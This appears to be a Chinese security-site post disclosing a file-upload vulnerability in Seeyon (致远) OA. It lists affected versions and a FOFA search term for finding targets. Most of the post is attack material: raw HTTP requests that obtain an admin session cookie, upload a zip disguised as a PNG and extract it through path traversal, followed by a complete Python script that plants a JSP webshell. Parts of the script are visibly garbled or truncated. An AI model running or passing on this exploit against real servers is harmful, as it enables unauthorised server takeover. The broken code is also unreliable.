致远OA⽂件上传漏洞——可以上传webshell 致远OA⽂件上传漏洞预警
1.漏洞描述
致远OA是⼀套⽤于OA办公的⾃动化软件,该软件存在⽂件上传漏洞,攻击者能够上传恶意脚本⽂
件,从⽽控制服务器。
2.影响版本
致远OAV8.0,V7.1,V7.1SP1,V7.0,V7.0SP1,V7.0SP2,V7.0SP3,V6.0,V6.1SP1,
V6.1SP2,V5.x
3.漏洞复现
FOFA搜索"seeyon":
⾸先是⼀个获取管理cookie的漏洞:
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQz
NDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
  然后上传压缩包:
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
-
-59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.png"
Content-Type: image/png
111
--59229605f98b8cf290a7b8908b34616b--
  然后解压:
POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913
Content-Length: 157
method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayo
utAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D
  完整poc:
#coding:utf-8
import time
import datetime
import zipfile
import random
import string
import requests
import re
import os
requests.packages.urllib3.disable_warnings()
proxy = None#{'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +www.baidu/search/spider.html)"
def check_file():
path = os.getcwd()
file_path = os.path.join(path,"payload.zip")
if ists(file_path):
def write_zipfile(fname, content):
with zipfile.ZipFile('payload.zip', mode='a', compression=zipfile.ZIP_DEFLATED, ) as zf:
jsessionidzf.writestr('l', "")
zf.writestr(fname, content)
def rand_str(num):
ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num))
return ran_str
def get_cookie(targeturl):
headers = {'User-Agent': ua,'Content-Type': 'application/x-www-formurlencoded'}
url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl)
post= "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8")
response = requests.post(url=url,data=post,proxies=proxy,headers=headers,
timeout=60,verify=False)
if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
cookies = kies
cookies = requests.utils.dict_from_cookiejar(cookies)
jsessionid = cookies['JSESSIONID']
print("[+] get cookie:{jsessionid}".format(jsessionid=jsessionid))
return jsessionid
else:
print('[-] get cookie error !')
def upload_zip(targeturl,cookie):
url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl)
files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octetstream'))]
headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': ua}
post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 'isEncrypt': "0"}
response = requests.post(url=url,files=files,data=post,
headers=headers,proxies=proxy,timeout=60,verify=False)
if response and response.status_code == 200 and 'fileurls=' :
fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',,re.I)
if len(fileid) > 0:
print("[+] get fileid:{fileid}".format(fileid=fileid))
return fileid[0]
else:
print("[-] get fileid error !")
def extract_file(targeturl,cookie,fileid):
url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl)
headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': ua, 'Content-Type':'application/x-www-form-urlencoded'}
datestr = time.strftime('%Y-%m-%d')
post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D'
response = requests.post(url, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
if response.status_code == 500 and "Error" :
print("[+] extract file is ok!")
return True
else:
print("[-] extract file error !")
def main(targeturl):
fname = f'../{rand_str(8)}.jsp'
shell = r'<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));new java.io.ServletPath())).delete();%>'    check_file()
write_zipfile(fname,shell)
cookie = get_cookie(targeturl)
fileid = upload_zip(targeturl, cookie)
if extract_file(targeturl, cookie, fileid):
url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1])
print("webshell path: {url}".format(url=url))
if __name__ == '__main__':
targeturl = "xxx"
main(targeturl)

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。